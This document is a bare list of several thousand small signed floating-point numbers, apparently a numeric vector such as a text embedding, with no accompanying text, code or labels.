-0.002729585161432624, -0.011693878099322319, -0.009701812639832497, -0.008789416402578354, 0.015122966840863228, -0.003465204732492566, -0.041544441133737564, 0.004128592554479837, 0.004014543257653713, -0.01780693233013153, 0.05516955628991127, 0.0037750392220914364, -0.002030081581324339, 0.04157485440373421, -0.012446604669094086, 0.015906106680631638, 0.019023461267352104, 0.02084825374186039, 0.028299488127231598, -0.0036381797399371862, -0.009846275672316551, -0.0008967143949121237, -0.005732889287173748, 0.05027303099632263, -0.020513707771897316, -0.03175138682126999, -0.015693213790655136, 0.00025376019766554236, 0.009017515927553177, -0.004702642094343901, 0.011739498004317284, 0.006983632687479258, -0.03275502473115921, 0.028740480542182922, 0.006865781266242266, -0.013647926039993763, -0.031143123283982277, 0.01037090364843607, -0.004124790895730257, 0.02173023670911789, 0.0038928904104977846, 0.00016370858065783978, 0.0022809903603047132, 0.01721387542784214, -0.003579254262149334, -0.000644379819277674, 0.013731562532484531, -0.019646931439638138, 0.021684616804122925, -0.00043338819523341954, -0.012910406105220318, 0.007230739574879408, -0.0011243382468819618, -0.018141478300094604, 0.014317017048597336, -0.006314542144536972, 0.0038814854342490435, 0.012765943072736263, -0.00469884043559432, 0.04124030843377113, 0.022079987451434135, 0.008196359500288963, -0.009078342467546463, -0.020574534311890602, -0.03293750062584877, -0.009169581346213818, 0.015472718514502048, 0.02331172302365303, 0.009511730633676052, 0.01700098253786564, -0.009078342467546463, -0.00786181353032589, -0.021654203534126282, -0.010705448687076569, -0.014970900490880013, -0.007937846705317497, 0.00008310170960612595, -0.02390477992594242, -0.0020642962772399187, -0.0241024661809206, 0.00004918385820928961, 0.009587762877345085, -0.0017192965606227517, -0.010994373820722103, 0.0024007423780858517, -0.02458907663822174, 0.008827432990074158, -0.014780818484723568, -0.005903963465243578, 0.02518213540315628, 0.0013258256949484348, -0.0183847825974226, 0.03619171679019928, 0.012879992835223675, 0.014073710888624191, -0.006113054230809212, -0.006611070595681667, -0.029576843604445457, -0.0219127144664526, -0.003465204732492566, 0.0005060947732999921, 0.00840925145894289, -0.004181815776973963, 0.0016090486897155643, -0.00031791304354555905, -0.0006852475344203413, 0.016757676377892494, 0.02350940927863121, 0.010986770503222942, 0.004622807260602713, 0.0009257019846700132, -0.03239006549119949, -0.0006557847373187542, 0.015411891974508762, 0.011290903203189373, -0.027554364874958992, 0.012157679535448551, -0.006417186465114355, 0.0028170233126729727, 0.010857515037059784, -0.03570510447025299, 0.03360659256577492, -0.00866016000509262, 0.03020031377673149, -0.022673044353723526, 0.02270345762372017, -0.02023998834192753, -0.04124030843377113, 0.020392054691910744, -0.003972725011408329, 0.0005797517369501293, 0.019205939024686813, 0.010051564313471317, -0.010507762432098389, 0.015571561641991138, -0.04257848858833313, -0.019038667902350426, 0.01052296906709671, 0.015001313760876656, 0.008865449577569962, -0.040267083793878555, -0.010484952479600906, 0.016149412840604782, -0.011093216948211193, 0.033576179295778275, 0.004235038999468088, 0.013974868692457676, -0.014385446906089783, -0.01791337877511978, 0.007983466610312462, -0.013009249232709408, -0.0037636342458426952, -0.0008800821378827095, 0.018126271665096283, -0.0011994207743555307, -0.001306817401200533, 0.002761899260804057, 0.006884789559990168, -0.018734535202383995, -0.004444129765033722, 0.007664127741008997, 0.001462685177102685, -0.017867758870124817, 0.02863403409719467, 0.018065445125102997, 0.0012155778240412474, -0.006379169877618551, -0.01958610489964485, -0.011800323612987995, 0.04111865535378456, 0.00176966842263937, 0.005234872922301292, 0.0025223952252417803, 0.01592131331562996, -0.0247715562582016, 0.014050900936126709, 0.0013334290124475956, -0.005778509192168713, 0.0460151806473732, 0.004714047070592642, 0.004584790673106909, 0.001376197556965053, -0.029075024649500847, -0.0003877683775499463, 0.019312385469675064, 0.01564759388566017, -0.018035031855106354, -0.004512559622526169, 0.016347099095582962, -0.012803959660232067, -0.009526937268674374, -0.014134537428617477, 0.021000318229198456, -0.00805949978530407, 0.014301810413599014, -0.009663796052336693, -0.020589740946888924, 0.012819166295230389, 0.04729253426194191, 0.010758671909570694, 0.007337186019867659, 0.010249250568449497, 0.011891563422977924, 0.0018162386259064078, -0.015563958324491978, -0.01593651995062828, 0.004782476462423801, 0.01839998923242092, 0.008705779910087585, 0.0077287559397518635, -0.00012099941523047164, 0.00017392552399542183, -0.012879992835223675, -0.0005312807043083012, 0.00002463647979311645, 0.009686606004834175, -0.007093880325555801, 0.01976858451962471, -0.016088586300611496, -0.024148086085915565, -0.0016670238692313433, 0.017274701967835426, -0.002906362060457468, 0.012621480971574783, -0.0038263616152107716, 0.0038339646998792887, 0.014142140746116638, -0.015678007155656815, -0.001857106457464397, -0.012104456312954426, 0.000991280423477292, -0.014286603778600693, -0.003520328551530838, 0.008880656212568283, 0.012188092805445194, -0.005272889509797096, -0.007310574408620596, -0.006595863960683346, 0.004668427165597677, -0.004402311518788338, -0.0057480959221720695, -0.0006358260870911181, -0.01107040699571371, -0.0016698751132935286, 0.00016168896399904042, -0.00769454101100564, -0.016559990122914314, 0.013670735992491245, 0.01710742898285389, 0.005120823625475168, 0.0035127252340316772, 0.005991401616483927, -0.013571892865002155, 0.019981475546956062, -0.011442968621850014, -0.00018984494090545923, 0.012621480971574783, -0.0036914029624313116, -0.022247260436415672, 0.010994373820722103, -0.03768196329474449, -0.007162310183048248, 0.008774209767580032, -0.008135532960295677, -0.030215520411729813, -0.004394708201289177, -0.013838008977472782, 0.021182797849178314, 0.007230739574879408, -0.0109563572332263, 0.010773878544569016, -0.010005944408476353, 0.004200824070721865, -0.013457844033837318, 0.007877020165324211, 0.013351397588849068, 0.008911069482564926, -0.004166609141975641, 0.0015406189486384392, -0.002379833487793803, 0.027113372460007668, 0.010743465274572372, -0.00513983191922307, 0.008987102657556534, 0.0059191701002418995, -0.0063715665601193905, -0.006645285524427891, -0.01584528014063835, 0.009412887506186962, -0.020817840471863747, -0.021121971309185028, 0.01827833615243435, 0.006561649031937122, 0.001306817401200533, -0.0011775613529607654, 0.021000318229198456, -0.0024672714062035084, -0.007021648809313774, -0.00830280501395464, 0.022262467071413994, -0.008994705975055695, -0.011306109838187695, 0.0062004923820495605, 0.012013216502964497, -0.0021973541006445885, -0.0073752026073634624, -0.014119330793619156, -0.012606274336576462, -0.0015159082831814885, -0.016362305730581284, -0.008873052895069122, 0.017837345600128174, 0.00680495472624898, -0.0028227258007973433, 0.017153048887848854, -0.01416495069861412, -0.006626277230679989, -0.012096852995455265, 0.009952722117304802, 0.029926594346761703, 0.0016917346511036158, -0.019099492579698563, -0.00023712796973995864, 0.010135200805962086, -0.010005944408476353, 0.009914705529808998, 0.00040772705688141286, 0.01672726310789585, 0.014522305689752102, 0.02635304257273674, 0.0010302473092451692, -0.01592131331562996, -0.016073379665613174, 0.010766275227069855, 0.003138262778520584, -0.010241647250950336, 0.013670735992491245, 0.0056454516015946865, 0.021304450929164886, 0.0219127144664526, 0.0010188424494117498, 0.007451235316693783, -0.003647683886811137, 0.025927258655428886, 0.0036818988155573606, -0.0039575183764100075, -0.00786181353032589, 0.001011239131912589, 0.015617181546986103, 0.009070739150047302, 0.012013216502964497, -0.02153255045413971, 0.003453799756243825, 0.0031534694135189056, -0.010659828782081604, 0.011351728811860085, 0.012887596152722836, -0.00786181353032589, 0.005740492604672909, 0.009762639179825783, -0.009443300776183605, 0.013404620811343193, -0.0013286769390106201, -0.004063964821398258, 0.02271866425871849, 0.018156684935092926, 0.009914705529808998, 0.007458838634192944, -0.03962840884923935, -0.025896845385432243, -0.005706277675926685, -0.0003305060090497136, -0.005835534073412418, 0.006554045714437962, -0.012956026010215282, 0.014773215167224407, 0.019312385469675064, 0.020787427201867104, 0.015951726585626602, 0.0053641293197870255, 0.004482146352529526, 0.01631668582558632, 0.031508080661296844, 0.023159656673669815, 0.015335858799517155, 0.006884789559990168, 0.006892392877489328, 0.008257185108959675, -0.010028754360973835, 0.009002309292554855, -0.014537512324750423, 0.008812226355075836, -0.006884789559990168, 0.020224781706929207, 0.013153711333870888, 0.001684131333604455, 0.01563238725066185, -0.006234707310795784, -0.007067268714308739, 0.019114699214696884, -0.016666436567902565, 0.008979499340057373, -0.011982803232967854, 0.004326278809458017, -0.003550741821527481, 0.001963552553206682, -0.004162807483226061, -0.0013980570947751403, -0.027158992365002632, 0.0018770650494843721, 0.012697513215243816, -0.011990406550467014, 0.006348756607621908, 0.0030052049551159143, -0.004580989014357328, -0.007219334598630667, 0.0004740183358080685, -0.021791061386466026, 0.020224781706929207, 0.013343794271349907, -0.003759832587093115, -0.015518338419497013, -0.01018082071095705, 0.034062791615724564, -0.00850049126893282, -0.002134626964107156, 0.004044956527650356, 0.007318177726119757, 0.011648258194327354, -0.014613545499742031, -0.02154775708913803, 0.01249222457408905, -0.0049117328599095345, -0.013898835517466068, 0.016788089647889137, -0.005474376957863569, -0.00708247534930706, -0.008485284633934498, 0.019099492579698563, -0.0008895862847566605, -0.007953053340315819, -0.0014246685896068811, 0.0152446199208498, 0.01459833886474371, 0.008241978473961353, -0.007831400260329247, -0.008279995061457157, -0.000030532006348948926, 0.015191396698355675, 0.004550575744360685, -0.035248905420303345, 0.002550907665863633, 0.00708247534930706, 0.015191396698355675, 0.00796825997531414, -0.004501154646277428, -0.0022676847875118256, 0.0013229744508862495, -0.012758339755237103, 0.0003483262553345412, 0.005508591886609793, -0.006561649031937122, 0.02577519230544567, -0.0004158055526204407, 0.01908428594470024, 0.0015520239248871803, -0.010241647250950336, 0.0023988415487110615, -0.0009242763626389205, -0.021562963724136353, -0.007641318254172802, 0.003010907443240285, -0.008827432990074158, 0.014142140746116638, 0.00861454103142023, -0.012705116532742977, 0.005109418649226427, 0.012332554906606674, 0.022855523973703384, 0.0043909065425395966, -0.0258664321154356, 0.003991733305156231, -0.00964098609983921, -0.002558510983362794, -0.0001944781979545951, -0.01161024160683155, -0.010424126870930195, -0.001317271962761879, -0.006116855889558792, -0.0012298340443521738, 0.005542806815356016, -0.011975199915468693, 0.010789085179567337, 0.014043297618627548, -0.020407261326909065, 0.018764948472380638, 0.0007878921460360289, -0.006447599735110998, 0.005653054919093847, 0.005341319367289543, 0.002636444754898548, 0.023266103118658066, -0.02093949168920517, -0.007048260420560837, -0.01504693366587162, -0.014423463493585587, -0.005941980052739382, -0.006789748091250658, -0.006934211123734713, 0.005025782156735659, 0.024360978975892067, -0.009443300776183605, 0.0013011150294914842, -0.0010901233181357384, -0.004105782601982355, -0.006325946655124426, -0.012226108461618423, 0.00585454236716032, 0.025683952495455742, -0.007816193625330925, 0.009230407886207104, -0.006945616099983454, -0.007014045491814613, 0.002108015352860093, 0.022490566596388817, -0.015373875387012959, 0.013328587636351585, -0.0055656167678534985, -0.002600329229608178, -0.02133486419916153, 0.007531070150434971, 0.02398081310093403, 0.007953053340315819, 0.019145112484693527, -0.013739165849983692, 0.011534208431839943, -0.010849911719560623, 0.025303786620497704, 0.007493053562939167, 0.010211233980953693, -0.014446272514760494, 0.011009580455720425, -0.01470478530973196, -0.024513043463230133, 0.005672062747180462, 0.003961320035159588, -0.017548419535160065, 0.003820659127086401, 0.009815862402319908, -0.010013547725975513, -0.013199331238865852, -0.008036689832806587, 0.01563238725066185, -0.017259495332837105, 0.008021483197808266, 0.0123857781291008, 0.008089913055300713, 0.00513603026047349, 0.004204625729471445, -0.005360327661037445, -0.004219832364469767, -0.003518427722156048, 0.0013486356474459171, 0.002147932769730687, -0.01955569162964821, 0.0041590058244764805, 0.022156020626425743, 0.006930409464985132, -0.006656690500676632, 0.03232923895120621, -0.012028423137962818, -0.012971232645213604, -0.0031610727310180664, 0.020513707771897316, 0.006147269159555435, -0.0011937182862311602, -0.006968426052480936, 0.002623138949275017, 0.026124944910407066, -0.006899996194988489, -0.0013296273536980152, -0.01259106770157814, -0.0010445035295560956, 0.000286311813397333, -0.01906908117234707, 0.03275502473115921, -0.003693303791806102, 0.0026706596836447716, -0.0017839246429502964, 0.007531070150434971, -0.011458175256848335, -0.02545585297048092, -0.014970900490880013, 0.008797019720077515, 0.01818709820508957, -0.01722908206284046, -0.01732032001018524, 0.01391404215246439, -0.00496875774115324, -0.005523798521608114, 0.035553038120269775, 0.006436194758862257, 0.0007584293489344418, -0.03263337165117264, 0.010994373820722103, -0.016468750312924385, 0.024513043463230133, 0.019935857504606247, 0.03695204481482506, 0.01514577679336071, -0.012613877654075623, -0.007432227488607168, 0.007584293372929096, -0.006763136945664883, -0.01719866879284382, -0.01338181085884571, 0.006770739797502756, 0.00830280501395464, 0.0020471890456974506, 0.018628088757395744, -0.001528263557702303, 0.015191396698355675, 0.005782310850918293, 0.007915036752820015, 0.0014094620710238814, 0.004752063658088446, 0.011937183327972889, 0.013632719404995441, 0.008994705975055695, -0.024117672815918922, 0.00964098609983921, -0.03610047698020935, 0.016392719000577927, 0.011534208431839943, -0.0006272723549045622, -0.0021536352578550577, 0.016788089647889137, 0.003493717173114419, 0.0058469390496611595, 0.00673652533441782, -0.002376031829044223, -0.011693878099322319, -0.03248130530118942, -0.00023439552751369774, 0.0064209881238639355, 0.0028797504492104053, 0.0038719812873750925, -0.026429075747728348, 0.013952058739960194, -0.004580989014357328, -0.021578170359134674, -0.016544783487915993, 0.014453875832259655, 0.020680980756878853, -0.012781149707734585, 0.00452396459877491, 0.0035830559208989143, -0.007732557598501444, -0.027417505159974098, -0.007329582702368498, 0.006960822734981775, 0.01916031911969185, 0.0066224755719304085, -0.007614706642925739, -0.015556355006992817, -0.02537981979548931, -0.012697513215243816, -0.011526605114340782, -0.0016489659901708364, 0.004497352987527847, 0.005835534073412418, 0.006386773195117712, -0.022946763783693314, 0.01811106503009796, -0.016164619475603104, 0.008979499340057373, 0.010994373820722103, 0.022444946691393852, -0.0001275929098483175, 0.0023209077771753073, -0.00027847092133015394, 0.015115363523364067, -0.004976361058652401, -0.022399326786398888, -0.0032390065025538206, 0.018947428092360497, -0.020863458514213562, -0.0146971819922328, 0.012895199470221996, -0.012879992835223675, 0.007884623482823372, 0.00017962799756787717, 0.012089249677956104, 0.002339916070923209, 0.011207266710698605, -0.030747750774025917, -0.02547105960547924, -0.012264125049114227, -0.015252223238348961, -0.013435034081339836, 0.00779338413849473, 0.016438337042927742, 0.0008948135655373335, -0.03892890363931656, -0.03144725412130356, 0.03290708735585213, 0.011564621701836586, 0.02142610400915146, -0.0034880146849900484, 0.03993254154920578, -0.014742801897227764, 0.0194796584546566, -0.014271397143602371, 0.002087106229737401, -0.009352060966193676, 0.012887596152722836, 0.001019792864099145, 0.00619669072329998, 0.007930243387818336, -0.015084950253367424, 0.011222473345696926, 0.00007543900574091822, -0.02045288123190403, -0.015890900045633316, 0.0018095857230946422, -0.0018827675376087427, 0.007983466610312462, 0.016864122822880745, 0.01317652128636837, -0.0013742967275902629, 0.008644954301416874, -0.005455368664115667, 0.01847602240741253, -0.020726600661873817, 0.03263337165117264, -0.00015016520046629012, 0.007417020853608847, -0.02214081399142742, -0.01791337877511978, -0.005010575521737337, -0.011085613630712032, 0.011998009867966175, -0.006287930533289909, 0.004223634023219347, 0.007196525111794472, -0.0032295023556798697, 0.00602181488648057, 0.013419827446341515, 0.010325283743441105, 0.003792146686464548, 0.023342136293649673, 0.008006276562809944, 0.015951726585626602, -0.015183793380856514, -0.00895668938755989, 0.005470575299113989, 0.01800461858510971, 0.003719915170222521, 0.009222804568707943, -0.009336854331195354, 0.002444461453706026, -0.00636396324262023, 0.0018257427727803588, 0.00486991461366415, -0.022733870893716812, -0.01435503363609314, -0.01273552980273962, -0.009656192734837532, 0.013001645915210247, 0.004831898026168346, 0.0037351218052208424, -0.0011718588648363948, 0.015982139855623245, -0.020133541896939278, -0.018840981647372246, 0.002184048295021057, 0.005786112509667873, 0.008797019720077515, 0.0021498335991054773, -0.016696849837899208, 0.0010758672142401338, -0.007283962797373533, -0.0037028079386800528, 0.013054869137704372, 0.010218837298452854, -0.021867094561457634, -0.005090410355478525, -0.0039004937279969454, 0.01081189513206482, 0.014172554016113281, -0.008576524443924427, 0.006379169877618551, 0.003780741710215807, 0.007401814218610525, -0.010827101767063141, 0.018019825220108032, -0.0009043176542036235, 0.015062140300869942, 0.008720986545085907, -0.002940576756373048, 0.004850906319916248, 0.011564621701836586, -0.0018038832349702716, -0.013305777683854103, 0.009283631108701229, -0.027371885254979134, -0.014773215167224407, 0.011001977138221264, -0.006181484088301659, 0.006995037198066711, 0.027189405634999275, 0.0031610727310180664, -0.025714365765452385, -0.01214247290045023, 0.0014959495747461915, 0.0017259494634345174, 0.009093549102544785, -0.0067023104056715965, 0.017381146550178528, 0.006318343803286552, -0.0028911554254591465, 0.006945616099983454, 0.006850574631243944, 0.005531401839107275, 0.00585074070841074, 0.015548751689493656, -0.010218837298452854, 0.019418831914663315, -0.00585074070841074, -0.016833709552884102, 0.01719866879284382, 0.002299998654052615, -0.008561317808926105, -0.014126934111118317, -0.014643958769738674, 0.033272046595811844, 0.013039662502706051, 0.007907433435320854, -0.0020262799225747585, -0.008895862847566605, 0.006842971313744783, 0.0008876854553818703, -0.019449245184659958, 0.013457844033837318, -0.010416523553431034, 0.00047092948807403445, 0.005569418426603079, -0.003136361949145794, 0.0009941316675394773, -0.003723716828972101, -0.012347761541604996, -0.011100820265710354, -0.007219334598630667, -0.005508591886609793, 0.0022163623943924904, -0.014317017048597336, -0.01170908473432064, 0.0039042953867465258, -0.022490566596388817, 0.0008173549431376159, -0.012659496627748013, 0.008720986545085907, 0.019996682181954384, -0.02820824831724167, -0.013883628882467747, 0.007432227488607168, -0.02537981979548931, 0.020893871784210205, -0.007192723453044891, -0.014126934111118317, -0.010264457203447819, 0.0024197506718337536, 0.0030831387266516685, -0.020376848056912422, -0.005835534073412418, -0.014689578674733639, 0.012902802787721157, 0.016772883012890816, -0.01624065265059471, 0.004136195871978998, -0.005147435236722231, 0.007945450022816658, -0.000011159923815284856, 0.012226108461618423, 0.016255859285593033, -0.01811106503009796, 0.03737783059477806, 0.0015881395665928721, 0.03649584576487541, -0.0032504114788025618, -0.00816594623029232, -0.019342798739671707, -0.014012884348630905, 0.003949915058910847, -0.002271486446261406, 0.007268756162375212, -0.0438254289329052, -0.0034499980974942446, 0.001924585667438805, 0.0017335527809336782, 0.009473714046180248, 0.005280492827296257, 0.01690974272787571, -0.006713715381920338, 0.002136527793481946, 0.007542475126683712, 0.0177156925201416, 0.013647926039993763, -0.026200976222753525, -0.008705779910087585, -0.011306109838187695, 0.00015871891810093075, -0.013001645915210247, 0.008538507856428623, 0.0016176024219021201, 0.006934211123734713, 0.0012431398499757051, -0.012978835962712765, 0.017639659345149994, -0.02419370599091053, -0.004657022189348936, 0.0021213211584836245, -0.0009409085614606738, 0.006884789559990168, -0.007610904984176159, -0.005991401616483927, 0.014408256858587265, -0.0053945425897836685, 0.0035431385040283203, -0.010005944408476353, 0.009085945785045624, -0.0061510708183050156, -0.0005654955748468637, -0.011382142081856728, -0.012378174811601639, 0.008363631553947926, 0.0016632222104817629, -0.009412887506186962, -0.0017962800338864326, -0.04139237478375435, -0.015191396698355675, 0.01563238725066185, 0.033667419105768204, -0.008356028236448765, -0.005379335954785347, 0.003972725011408329, 0.0009152474231086671, 0.013898835517466068, -0.01161024160683155, 0.009709415957331657, 0.016468750312924385, 0.010028754360973835, 0.000740371469873935, -0.006542641203850508, -0.021121971309185028, -0.01701618917286396, 0.016575196757912636, 0.008203962817788124, 0.026398662477731705, -0.006542641203850508, 0.0008054747595451772, 0.009116358123719692, -0.011998009867966175, 0.015890900045633316, 0.007610904984176159, -0.011724291369318962, -0.011633051559329033, -0.010401316918432713, 0.01751800626516342, -0.007436028681695461, -0.008819829672574997, 0.00585454236716032, -0.013594702817499638, 0.0034195848274976015, -0.006565450690686703, -0.010439332574605942, -0.0016147511778399348, -0.024132879450917244, -0.01494809053838253, 0.009534540586173534, -0.019798997789621353, 0.01849122904241085, -0.00992991216480732, 0.020787427201867104, 0.016666436567902565, -0.0017753709107637405, 0.0029766925144940615, -0.0007978714420460165, -0.02685486152768135, 0.0056682610884308815, 0.0053641293197870255, -0.01827833615243435, 0.013001645915210247, -0.004147600848227739, 0.021106764674186707, -0.0014930983306840062, -0.001405660412274301, 0.03558345139026642, -0.0031610727310180664, 0.004558179061859846, -0.014035694301128387, 0.003088841214776039, 0.002096610376611352, 0.003157271072268486, 0.024056846275925636, -0.0020243790931999683, 0.023463789373636246, -0.006215699017047882, 0.016499163582921028, -0.0003649584832601249, -0.0004131919122301042, 0.02840593457221985, -0.004554377403110266, -0.005603633355349302, 0.019920650869607925, -0.016544783487915993, -0.015252223238348961, 0.007831400260329247, 0.006968426052480936, -0.024528250098228455, 0.013130901381373405, 0.004094378091394901, 0.0061928890645504, 0.004649418871849775, 0.010599002242088318, 0.006725120358169079, 0.013085282407701015, 0.0058165257796645164, -0.01249222457408905, -0.0003043696633540094, 0.008888259530067444, 0.027265438809990883, -0.004048758186399937, 0.004664625506848097, -0.013571892865002155, -0.007215532939881086, -0.009504127316176891, -0.013792389072477818, 0.010781481862068176, -0.013503463938832283, -0.009177184663712978, -0.020498501136898994, -0.016088586300611496, 0.019327592104673386, 0.012241315096616745, -0.01690974272787571, -0.002049089875072241, 0.0028721471317112446, 0.0004462187644094229, -0.003769336733967066, 0.033971551805734634, 0.0006861979491077363, -0.0017649163492023945, -0.00265355221927166, -0.0046418155543506145, 0.008698176592588425, 0.005356526002287865, -0.024528250098228455, 0.00041105347918346524, 0.010629415512084961, 0.020711394026875496, 0.01051536574959755, -0.0074778469279408455, -0.018323956057429314, -0.033272046595811844, -0.00895668938755989, 0.011921976692974567, 0.0021289244759827852, 0.007732557598501444, 0.014575528912246227, -0.01405850425362587, 0.008485284633934498, -0.019540484994649887, -0.010545779019594193, 0.01672726310789585, -0.003159171901643276, -0.01722908206284046, -0.02489320933818817, -0.005147435236722231, -0.005512393545359373, 0.03461023047566414, -0.0075576817616820335, 0.01450709905475378, 0.00384727050550282, -0.02401122637093067, 0.0219127144664526, 0.0029462792444974184, -0.004569584038108587, -0.0014398752246052027, -0.011929580010473728, 0.01879536174237728, 0.009952722117304802, -0.01809585839509964, 0.004759666975587606, -0.010857515037059784, -0.014415860176086426, 0.017670072615146637, 0.008424458093941212, -0.007907433435320854, -0.018856188282370567, 0.016544783487915993, 0.013047265820205212, 0.0015700818039476871, -0.019601311534643173, -0.044585760682821274, -0.002896857913583517, 0.006417186465114355, 0.00983106903731823, 0.014628752134740353, -0.006759335286915302, 0.02162379026412964, -0.0026193372905254364, 0.022581806406378746, -0.01581486687064171, -0.00292537035420537, -0.03129518777132034, 0.011929580010473728, 0.01126809325069189, 0.008249581791460514, 0.0021859491243958473, -0.00948892068117857, 0.01336660422384739, 0.010834705084562302, -0.013564289547502995, -0.016681643202900887, 0.008690573275089264, -0.016894536092877388, 0.013739165849983692, 0.013435034081339836, -0.02211040072143078, 0.011496191844344139, -0.010599002242088318, -0.020331228151917458, -0.009473714046180248, -0.015571561641991138, -0.009161978028714657, -0.018065445125102997, -0.005250079557299614, -0.002917767036706209, -0.00207570125348866, -0.0023836351465433836, 0.0024311556480824947, -0.006516029592603445, 0.006649087183177471, -0.015252223238348961, 0.00875139981508255, -0.005881153512746096, 0.003379667643457651, -0.0013895033625885844, -0.01139734871685505, 0.004653220530599356, 0.000471404695417732, -0.00939007755368948, 0.007139500230550766, -0.019327592104673386, 0.0027333868201822042, 0.031097503378987312, -0.008979499340057373, 0.01097156386822462, -0.006360161583870649, 0.004565782379359007, -0.030641304329037666, -0.018232716247439384, 0.0012041728477925062, 0.014332223683595657, -0.016788089647889137, 0.010492555797100067, -0.02909023128449917, -0.005375534296035767, 0.005729087628424168, 0.027311058714985847, 0.013191727921366692, -0.011519001796841621, -0.0035830559208989143, -0.001586238737218082, 0.006797351408749819, 0.016164619475603104, -0.011108423583209515, 0.004060163162648678, 0.010401316918432713, -0.004265452269464731, 0.003643882228061557, 0.012203299440443516, -0.015784453600645065, 0.01780693233013153, -0.012279331684112549, -0.0166208166629076, -0.02005750872194767, -0.01879536174237728, -0.006516029592603445, -0.006101649720221758, 0.02223205380141735, -0.01996627077460289, 0.0065008229576051235, -0.005147435236722231, 0.002664957195520401, -0.012606274336576462, 0.00885024294257164, -0.01879536174237728, 0.00830280501395464, 0.007002640515565872, -0.004219832364469767, -0.0010739663848653436, 0.01161024160683155, 0.006668095476925373, -0.007877020165324211, 0.004504956305027008, 0.0020699987653642893, 0.013853215612471104, -0.016955362632870674, -0.01106280367821455, -0.014765611849725246, -0.0007660326082259417, -0.002201155759394169, 0.01602775976061821, 0.013153711333870888, 0.009663796052336693, -0.010386110283434391, -0.003022312419489026, 0.004774873144924641, 0.009017515927553177, 0.011899166740477085, -0.025714365765452385, 0.0177156925201416, 0.008036689832806587, -0.014902470633387566, 0.0006068384973332286, -0.005808922462165356, -0.003145866096019745, -0.007945450022816658, -0.004923137836158276, -0.0016869825776666403, -0.02221684716641903, 0.016742469742894173, 0.020635360851883888, 0.013153711333870888, 0.000659111188724637, 0.013830405659973621, 0.008439664728939533, 0.00045429726014845073, 0.017137842252850533, 0.0062499139457941055, 0.011868753470480442, -0.005371732637286186, -0.004679832141846418, -0.020787427201867104, 0.018430402502417564, 0.001414214144460857, -0.008021483197808266, -0.018962634727358818, -0.012112059630453587, 0.007340987678617239, 0.004197022411972284, 0.012887596152722836, 0.0068543762899935246, 0.01672726310789585, -0.0032846261747181416, 0.016255859285593033, 0.011823133565485477, 0.01372395921498537, 0.007166111841797829, 0.01768527925014496, 0.003721815999597311, 0.0008387392153963447, -0.003425287315621972, 0.005675864405930042, -0.0011623547179624438, 0.03871601074934006, -0.006086443085223436, 0.005957186687737703, -0.002271486446261406, 0.013108091428875923, -0.014894867315888405, 0.010408920235931873, -0.001933139399625361, 0.021121971309185028, -0.015107760205864906, 0.003828262211754918, 0.0027923125308007, -0.0055846250616014, -0.020300814881920815, -0.030702130869030952, 0.015434701927006245, -0.00558082340285182, -0.007150905206799507, -0.00513983191922307, 0.007975863292813301, -0.011883960105478764, -0.0068543762899935246, 0.0010625614086166024, -0.0032257006969302893, 0.0138151990249753, -0.013746769167482853, 0.028938164934515953, -0.009093549102544785, 0.0016518172342330217, -0.0007741111330688, -0.01613420620560646, 0.004307270515710115, 0.007268756162375212, 0.0041095842607319355, 0.0027866100426763296, -0.03263337165117264, -0.000865825975779444, 0.0015254124300554395, 0.012879992835223675, 0.008295201696455479, -0.00040772705688141286, 0.003995534963905811, 0.007371400948613882, 0.018856188282370567, 0.008789416402578354, 0.02378312684595585, 0.021791061386466026, -0.00929123442620039, 0.019023461267352104, -0.011693878099322319, 0.01739635318517685, 0.004352889955043793, -0.008295201696455479, 0.012020819820463657, 0.021198004484176636, 0.015130570158362389, 0.01097156386822462, 0.016255859285593033, 0.013442637398838997, 0.01788296550512314, 0.0011946687009185553, 0.0005327063263393939, -0.01604296639561653, -0.0008339871419593692, 0.006109252572059631, -0.007983466610312462, 0.011039993725717068, -0.00850049126893282, 0.0071052853018045425, 0.009230407886207104, 0.02390477992594242, 0.008348424918949604, -0.007785780820995569, 0.01327536441385746, -0.04318675398826599, -0.00663768220692873, 0.008933879435062408, 0.016575196757912636, -0.0068239630199968815, -0.0223385002464056, -0.016407925635576248, -0.02705254778265953, 0.007036855444312096, 0.019814204424619675, -0.008622144348919392, -0.021699823439121246, 0.002818924142047763, 0.015168586745858192, 0.01897784136235714, -0.024345772340893745, 0.019008254632353783, 0.0024862796999514103, 0.013161314651370049, -0.011176853440701962, -0.013655529357492924, -0.004919336177408695, 0.003223799867555499, -0.015320652164518833, 0.0020186766050755978, 0.01700098253786564, 0.015366272069513798, 0.0008720036712475121, -0.023053210228681564, -0.004322477150708437, -0.019646931439638138, -0.0072763594798743725, 0.003866278799250722, -0.004337683320045471, -0.010507762432098389, -0.0034366922918707132, -0.011906770057976246, -0.015799660235643387, -0.010500159114599228, 0.0023133044596761465, -0.005303302779793739, 0.008880656212568283, -0.018126271665096283, 0.00006878611748106778, -0.026900481432676315, -0.019890237599611282, 0.01140495203435421, -0.016058173030614853, 0.005459170322865248, -0.03765155002474785, -0.02507568895816803, -0.0017820238135755062, -0.036526259034872055, 0.0012669001007452607, -0.007147103548049927, -0.006979831028729677, 0.006037021521478891, 0.002894957084208727, 0.016590403392910957, -0.01957089826464653, 0.006352558266371489, -0.016103792935609818, -0.009564952924847603, 0.0115037951618433, -0.0030280149076133966, 0.016058173030614853, 0.014210570603609085, 0.01362511608749628, 0.015062140300869942, 0.019494865089654922, 0.010576192289590836, 0.0019378914730623364, -0.00292537035420537, -0.007097681984305382, -0.024224119260907173, -0.018339162692427635, -0.010302473790943623, 0.016681643202900887, -0.0016622717957943678, 0.0036305764224380255, -0.006143467500805855, 0.002645948901772499, -0.012036026455461979, -0.0017934287898242474, -0.002157436916604638, 0.011321315541863441, 0.007185120135545731, -0.01514577679336071, 0.015662800520658493, 0.005151236895471811, -0.00894908607006073, 0.010918340645730495, 0.004052559845149517, 0.012081646360456944, -0.007922640070319176, -0.022490566596388817, -0.0019416931318119168, -0.009808259084820747, 0.0024311556480824947, -0.008736193180084229, -0.0024007423780858517, -0.036830391734838486, -0.009374870918691158, 0.0123857781291008, 0.01808065176010132, 0.006253715604543686, -0.006679500453174114, 0.01459833886474371, 0.00433008000254631, -0.004782476462423801, -0.0005341319483704865, 0.012530241161584854, 0.01116164680570364, -0.00323330401442945, 0.011587431654334068, -0.006223302334547043, -0.005710079334676266, 0.027752051129937172, -0.006561649031937122, 0.00904032588005066, 0.00894148275256157, 0.009405284188687801, 0.0008729540859349072, -0.01503933034837246, -0.01780693233013153, -0.00796825997531414, -0.01631668582558632, -0.014925280585885048, -0.019190732389688492, -0.004622807260602713, 0.007489251904189587, 0.027508744969964027, -0.0009708465659059584, 0.01449949573725462, 